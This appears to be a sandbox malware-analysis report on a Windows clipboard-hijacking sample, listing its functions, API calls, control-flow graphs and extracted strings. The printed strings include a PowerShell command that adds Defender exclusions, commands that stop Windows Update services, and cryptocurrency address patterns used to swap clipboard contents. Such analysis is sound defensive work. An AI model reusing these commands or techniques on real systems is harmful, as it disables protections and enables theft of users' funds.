                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407A01
                                                                                                                                    • wcscmp.NTDLL ref: 00407A13
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00407A32
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                                                                    • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -$/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait$AlwaysAutoUpdate$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$AutoUpdateOptions$DisableWindowsUpdate$DisableWindowsUpdate$EnableWindowsUpdate$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$OverrideNotice$PreventDownload$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Policies\Microsoft\Windows\UpdateOrchestrator$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\DoSvc$SYSTEM\CurrentControlSet\Services\UsoSvc$SYSTEM\CurrentControlSet\Services\WaaSMedicSvc$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$Start$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$cmd.exe$cmd.exe$mmn7nnm8na$open$open$sysppvrdnvs.exe
                                                                                                                                    • API String ID: 4172876685-159212852
                                                                                                                                    • Opcode ID: 14d5bbea81be467e13e3765130848305c9d0a11b32ad18c98a91a2c8bc0bfa95
                                                                                                                                    • Instruction ID: 367eef7d7cdc4f6bbf58631969cb55eb0d30a7b17f9c19f9a6cac2e90da0940f
                                                                                                                                    • Opcode Fuzzy Hash: 14d5bbea81be467e13e3765130848305c9d0a11b32ad18c98a91a2c8bc0bfa95
                                                                                                                                    • Instruction Fuzzy Hash: 245240B1A80318BBE7209BA0DC4AFD97775AB48B15F1081A5B309B61D0D7F5AAC4CF5C
                                                                                                                                    Function 0040F400 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60sleepprocessCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 82 40f400-40f460 memset * 2 CreateProcessW 83 40f471-40f495 ShellExecuteW 82->83 84 40f462-40f46f Sleep 82->84 86 40f4a6 83->86 87 40f497-40f4a4 Sleep 83->87 85 40f4a8-40f4ab 84->85 86->85 87->85
                                                                                                                                    APIs
                                                                                                                                    • memset.NTDLL ref: 0040F40E
                                                                                                                                    • memset.NTDLL ref: 0040F41E
                                                                                                                                    • CreateProcessW.KERNELBASE(00000000,00407D11,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040F457
                                                                                                                                    • Sleep.KERNELBASE(000003E8), ref: 0040F467
                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00407D11,00000000,00000000,00000000), ref: 0040F482
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040F49C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                                                                    • String ID: $D$open
                                                                                                                                    • API String ID: 3787208655-2182757814
                                                                                                                                    • Opcode ID: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
                                                                                                                                    • Instruction ID: 03d024a0b9a73c413bf1553ab10d0ee3a8ab15297eec0ef6a9417e1ec1830951
                                                                                                                                    • Opcode Fuzzy Hash: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
                                                                                                                                    • Instruction Fuzzy Hash: ED112B71A80308BAEB209B90CD46FDE7778AB14B10F204135FA047E2C0D6B9AA448759

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 004068E0 Relevance: 105.4, APIs: 47, Strings: 13, Instructions: 407fileCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 92 4068e0-4068f5 _chkstk 93 4068f7-4068f9 92->93 94 4068fe-4069d0 wsprintfW * 6 PathFileExistsW 92->94 95 406f64-406f67 93->95 96 4069d2-4069f3 call 40f1f0 94->96 97 406a14-406a23 PathFileExistsW 94->97 96->97 109 4069f5-406a0e SetFileAttributesW DeleteFileW 96->109 99 406ac4-406acd 97->99 100 406a29-406a38 PathFileExistsW 97->100 101 406af5-406b04 PathFileExistsW 99->101 102 406acf-406ada call 4064a0 99->102 104 406a59-406a68 PathFileExistsW 100->104 105 406a3a-406a53 SetFileAttributesW DeleteFileW 100->105 110 406b06-406b26 call 40f1f0 101->110 111 406b47-406b56 PathFileExistsW 101->111 102->101 123 406adc-406af0 call 40f1f0 102->123 106 406a6a-406a7b CreateDirectoryW 104->106 107 406a8c-406a9b PathFileExistsW 104->107 105->104 106->107 112 406a7d-406a86 SetFileAttributesW 106->112 107->99 115 406a9d-406ab3 CopyFileW 107->115 109->97 110->111 124 406b28-406b41 SetFileAttributesW DeleteFileW 110->124 113 406b58-406b62 111->113 114 406bca-406bd9 PathFileExistsW 111->114 112->107 113->114 119 406b64-406b71 PathFileExistsW 113->119 121 406c75-406c96 FindFirstFileW 114->121 122 406bdf-406bee PathFileExistsW 114->122 115->99 120 406ab5-406abe SetFileAttributesW 115->120 119->114 125 406b73-406b89 CopyFileW 119->125 120->99 128 406c9c-406d54 121->128 129 406f5e 121->129 126 406bf0-406bf6 122->126 127 406c2c-406c32 122->127 123->101 124->111 125->114 133 406b8b-406ba9 SetFileAttributesW PathFileExistsW 125->133 134 406c12-406c27 call 406660 126->134 135 406bf8-406c10 call 406660 126->135 131 406c34-406c4c call 406660 127->131 132 406c4e-406c63 call 406660 127->132 136 406d5e-406d72 lstrcmpW 128->136 129->95 153 406c66-406c6f SetFileAttributesW 131->153 132->153 133->114 140 406bab-406bc4 SetFileAttributesW DeleteFileW 133->140 152 406c2a 134->152 135->152 142 406d74-406d88 lstrcmpW 136->142 143 406d8a 136->143 140->114 142->143 149 406d8f-406da0 142->149 150 406f35-406f4b FindNextFileW 143->150 151 406db1-406db8 149->151 150->136 154 406f51-406f58 FindClose 150->154 155 406de6-406def 151->155 156 406dba-406dd7 lstrcmpiW 151->156 152->153 153->121 154->129 159 406df1 155->159 160 406df6-406e07 155->160 157 406dd9 156->157 158 406ddb-406de2 156->158 157->151 158->155 159->150 162 406e18-406e1f 160->162 163 406e21-406e3e PathMatchSpecW 162->163 164 406e8f-406e98 162->164 165 406e40 163->165 166 406e42-406e88 wsprintfW SetFileAttributesW DeleteFileW 163->166 167 406e9a 164->167 168 406e9f-406eae PathFileExistsW 164->168 165->162 166->164 167->150 169 406eb0 168->169 170 406eb5-406f05 wsprintfW * 2 168->170 169->150 172 406f07-406f1d call 4067a0 170->172 173 406f1f-406f2f MoveFileExW 170->173 172->150 173->150
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$wsprintf$ExistsPath$AttributesDelete$CreateDirectory_chkstk
                                                                                                                                    • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\rvlcfg.exe$%s\%s\rvldrv.exe$%s\*$shell32.dll$shell32.dll$shell32.dll$shell32.dll
                                                                                                                                    • API String ID: 495142193-638321828
                                                                                                                                    • Opcode ID: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
                                                                                                                                    • Instruction ID: 1e7642a3bb229a683b77cec8f60a4b6186945a0df842d4041ba496de3fd539ef
                                                                                                                                    • Opcode Fuzzy Hash: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
                                                                                                                                    • Instruction Fuzzy Hash: 500270B5900218EBDB20DB60DC44FEA7778BF44705F0485EAF50AA6190DBB89BD4CF69
                                                                                                                                    Function 00404970 Relevance: 71.0, APIs: 24, Strings: 16, Instructions: 989clipboardstringmemoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 0040498C
                                                                                                                                    • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404D99
                                                                                                                                    • StrStrW.SHLWAPI(00000000,cosmos), ref: 00404DC4
                                                                                                                                    • StrStrW.SHLWAPI(00000000,addr), ref: 00404DEF
                                                                                                                                    • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404E8A
                                                                                                                                    • StrStrW.SHLWAPI(00000000,ronin:), ref: 00404EA1
                                                                                                                                    • StrStrW.SHLWAPI(00000000,nano_), ref: 00404EB8
                                                                                                                                    • StrStrW.SHLWAPI(00000000,bnb), ref: 00405458
                                                                                                                                    • StrStrW.SHLWAPI(00000000,bc1p), ref: 00405474
                                                                                                                                    • StrStrW.SHLWAPI(00000000,bc1q), ref: 00405490
                                                                                                                                    • StrStrW.SHLWAPI(00000000,ronin:), ref: 004054B3
                                                                                                                                    • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 004054CD
                                                                                                                                    • StrStrW.SHLWAPI(00000000,cosmos), ref: 004054E7
                                                                                                                                    • StrStrW.SHLWAPI(00000000,addr), ref: 00405501
                                                                                                                                    • StrStrW.SHLWAPI(00000000,nano_), ref: 0040551B
                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004055F0
                                                                                                                                    • GlobalAlloc.KERNEL32(00002002,-00000001), ref: 0040560B
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0040561E
                                                                                                                                    • memcpy.NTDLL(00000000,00000000,-00000001), ref: 0040563C
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405648
                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405650
                                                                                                                                    • EmptyClipboard.USER32 ref: 0040565A
                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00405666
                                                                                                                                    • CloseClipboard.USER32 ref: 0040566C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Clipboard$Global$lstrlen$AllocCloseDataEmptyLockOpenUnlockmemcpy
                                                                                                                                    • String ID: 8$addr$addr$bc1p$bc1q$bitcoincash:$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos$hA$nano_$nano_$ronin:$ronin:
                                                                                                                                    • API String ID: 2017104846-250561147
                                                                                                                                    • Opcode ID: 25dea65d1d4449a2ef1eae01c065bfd0f7a4c4a1741e3957523323aa1ae31655
                                                                                                                                    • Instruction ID: 6e0617124f46e3e1bef08e4e409f6ed46b9961a6860853f8336ff2275e542cf2
                                                                                                                                    • Opcode Fuzzy Hash: 25dea65d1d4449a2ef1eae01c065bfd0f7a4c4a1741e3957523323aa1ae31655
                                                                                                                                    • Instruction Fuzzy Hash: 609237B0A04218EACF58CF41C0945BE7BB2AF82751F60C06BE9456F294C77D8EC1DB99
                                                                                                                                    Function 004084D0 Relevance: 62.3, APIs: 34, Strings: 1, Instructions: 1037COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                                    • String ID: Y
                                                                                                                                    • API String ID: 673498613-3233089245
                                                                                                                                    • Opcode ID: 535b8406bbf27203a3d06f507e019bd4b957b803c50952899959f8368776a3e9
                                                                                                                                    • Instruction ID: 8bc4f449e96fa991b651f766feedb24339ddc98edc011673b3c5a2d60d79d6a0
                                                                                                                                    • Opcode Fuzzy Hash: 535b8406bbf27203a3d06f507e019bd4b957b803c50952899959f8368776a3e9
                                                                                                                                    • Instruction Fuzzy Hash: 79D23A79D11619EFCB54CF99C18099EFBF1FF88320F62859AD845AB305C630AA95DF80
                                                                                                                                    Function 004084F9 Relevance: 52.0, APIs: 34, Instructions: 1023COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 673498613-0
                                                                                                                                    • Opcode ID: 8c609b86bb28d5a081a49b133891f2681c0e63e2cb5ef732c119ad65bfffb674
                                                                                                                                    • Instruction ID: affa05b9e3e18e999c7216c09a62115e88c49fe898542c2adc9745ce68515915
                                                                                                                                    • Opcode Fuzzy Hash: 8c609b86bb28d5a081a49b133891f2681c0e63e2cb5ef732c119ad65bfffb674
                                                                                                                                    • Instruction Fuzzy Hash: 18D22A79D11619EFCB54CF99C18099EFBF1FF88320F62859AD845AB305C630AA95DF80
                                                                                                                                    Function 004059B0 Relevance: 25.7, APIs: 17, Instructions: 186clipboardregistryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 679 4059b0-4059d2 GetWindowLongW 680 4059d4-4059db 679->680 681 4059f6-4059fd 679->681 682 4059e1-4059e5 680->682 683 405a67-405a78 IsClipboardFormatAvailable 680->683 684 405a26-405a2c 681->684 685 4059ff 681->685 688 405a04-405a21 SetClipboardViewer SetWindowLongW 682->688 689 4059e7-4059eb 682->689 686 405a83-405a8d IsClipboardFormatAvailable 683->686 687 405a7a-405a81 683->687 691 405a46-405a4a 684->691 692 405a2e-405a44 SetWindowLongW 684->692 690 405be4-405bfd DefWindowProcA 685->690 694 405a98-405aa2 IsClipboardFormatAvailable 686->694 695 405a8f-405a96 686->695 693 405aab-405aaf 687->693 688->690 696 4059f1 689->696 697 405b9d-405bde RegisterRawInputDevices ChangeClipboardChain 689->697 698 405a62 691->698 699 405a4c-405a5c SendMessageA 691->699 692->698 701 405ab5-405abf OpenClipboard 693->701 702 405b7f-405b83 693->702 694->693 700 405aa4 694->700 695->693 696->690 697->690 698->690 699->698 700->693 701->702 703 405ac5-405ad6 GetClipboardData 701->703 704 405b85-405b95 SendMessageA 702->704 705 405b9b 702->705 706 405ad8 703->706 707 405add-405aee GlobalLock 703->707 704->705 705->690 706->690 708 405af0 707->708 709 405af5-405b06 707->709 708->690 710 405b08-405b0c 709->710 711 405b29-405b3c call 40d250 709->711 713 405b3e-405b4e call 4057f0 710->713 714 405b0e-405b12 710->714 720 405b51-405b65 GlobalUnlock CloseClipboard 711->720 713->720 717 405b14 714->717 718 405b16-405b27 call 405680 714->718 717->720 718->720 720->702 723 405b67-405b7c call 404970 call 40ab60 720->723 723->702
                                                                                                                                    APIs
                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 004059BC
                                                                                                                                    • SetClipboardViewer.USER32(?), ref: 00405A08
                                                                                                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 00405A1B
                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A70
                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405AB7
                                                                                                                                    • GetClipboardData.USER32(00000000), ref: 00405AC9
                                                                                                                                    • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405BD0
                                                                                                                                    • ChangeClipboardChain.USER32(?,?), ref: 00405BDE
                                                                                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 00405BF4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3549449529-0
                                                                                                                                    • Opcode ID: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
                                                                                                                                    • Instruction ID: 96d86bc259bd628418629a5c2f452591d45261003c5ffeff5fe086a58ca8b5ae
                                                                                                                                    • Opcode Fuzzy Hash: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
                                                                                                                                    • Instruction Fuzzy Hash: EB711C75A00608EFDF14DFA4D988BEF77B4EB48300F14856AE506B7290D779AA40CF69
                                                                                                                                    Function 004067A0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85filestringCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 754 4067a0-4067ef CreateDirectoryW wsprintfW FindFirstFileW 755 4067f5-406809 lstrcmpW 754->755 756 4068cf-4068d2 754->756 757 406821 755->757 758 40680b-40681f lstrcmpW 755->758 760 40689c-4068b2 FindNextFileW 757->760 758->757 759 406823-40686c wsprintfW * 2 758->759 761 406886-406896 MoveFileExW 759->761 762 40686e-406884 call 4067a0 759->762 760->755 763 4068b8-4068c9 FindClose RemoveDirectoryW 760->763 761->760 762->760 763->756
                                                                                                                                    APIs
                                                                                                                                    • CreateDirectoryW.KERNEL32(00406F1A,00000000), ref: 004067AF
                                                                                                                                    • wsprintfW.USER32 ref: 004067C5
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004067DC
                                                                                                                                    • lstrcmpW.KERNEL32(?,00411368), ref: 00406801
                                                                                                                                    • lstrcmpW.KERNEL32(?,0041136C), ref: 00406817
                                                                                                                                    • wsprintfW.USER32 ref: 0040683A
                                                                                                                                    • wsprintfW.USER32 ref: 0040685A
                                                                                                                                    • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406896
                                                                                                                                    • FindNextFileW.KERNEL32(000000FF,?), ref: 004068AA
                                                                                                                                    • FindClose.KERNEL32(000000FF), ref: 004068BF
                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 004068C9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                                                                    • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                    • API String ID: 92872011-445461498
                                                                                                                                    • Opcode ID: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
                                                                                                                                    • Instruction ID: 96f5080d1998a7d60275ba97af61759e4b4e94f5b4bc08b7936e0b3de653678a
                                                                                                                                    • Opcode Fuzzy Hash: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
                                                                                                                                    • Instruction Fuzzy Hash: 923145B5900218AFDB10DBA0DC88FDA7778BB48701F40C5E9F609A3195DA75EAD4CF98
                                                                                                                                    Function 00406F70 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 106sleepthreadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00406F7E
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00415DB8,00000104), ref: 00406F90
                                                                                                                                      • Part of subcall function 0040F1F0: CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
                                                                                                                                      • Part of subcall function 0040F1F0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
                                                                                                                                      • Part of subcall function 0040F1F0: CloseHandle.KERNEL32(000000FF), ref: 0040F232
                                                                                                                                    • ExitThread.KERNEL32 ref: 004070FA
                                                                                                                                      • Part of subcall function 004063E0: GetLogicalDrives.KERNEL32 ref: 004063E6
                                                                                                                                      • Part of subcall function 004063E0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
                                                                                                                                      • Part of subcall function 004063E0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
                                                                                                                                      • Part of subcall function 004063E0: RegCloseKey.ADVAPI32(?), ref: 0040647E
                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 004070ED
                                                                                                                                      • Part of subcall function 00406300: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406353
                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040702F
                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00407044
                                                                                                                                    • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040705F
                                                                                                                                    • wsprintfW.USER32 ref: 00407072
                                                                                                                                    • wsprintfW.USER32 ref: 00407092
                                                                                                                                    • wsprintfW.USER32 ref: 004070B5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                                                                    • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                                                                    • API String ID: 1650488544-2117135753
                                                                                                                                    • Opcode ID: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
                                                                                                                                    • Instruction ID: b797a4b926279b24144ff746e96c568fb56fd9e530b7e1178aba5a8e6206bca3
                                                                                                                                    • Opcode Fuzzy Hash: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
                                                                                                                                    • Instruction Fuzzy Hash: 244174B1D00214BBEB64DB94DC45FEE7779BB48700F1085A6F20AB61D0DA785B84CF6A
                                                                                                                                    Function 0040E190 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 117networkstringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
                                                                                                                                    • htons.WS2_32(0000076C), ref: 0040E1E0
                                                                                                                                    • inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
                                                                                                                                    • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
                                                                                                                                      • Part of subcall function 0040B430: htons.WS2_32(00000050), ref: 0040B45D
                                                                                                                                      • Part of subcall function 0040B430: socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
                                                                                                                                      • Part of subcall function 0040B430: connect.WS2_32(000000FF,?,00000010), ref: 0040B496
                                                                                                                                      • Part of subcall function 0040B430: getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
                                                                                                                                    • bind.WS2_32(000000FF,?,00000010), ref: 0040E243
                                                                                                                                    • lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
                                                                                                                                    • sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
                                                                                                                                    • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
                                                                                                                                      • Part of subcall function 0040E310: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
                                                                                                                                      • Part of subcall function 0040E310: Sleep.KERNEL32(000003E8), ref: 0040E36E
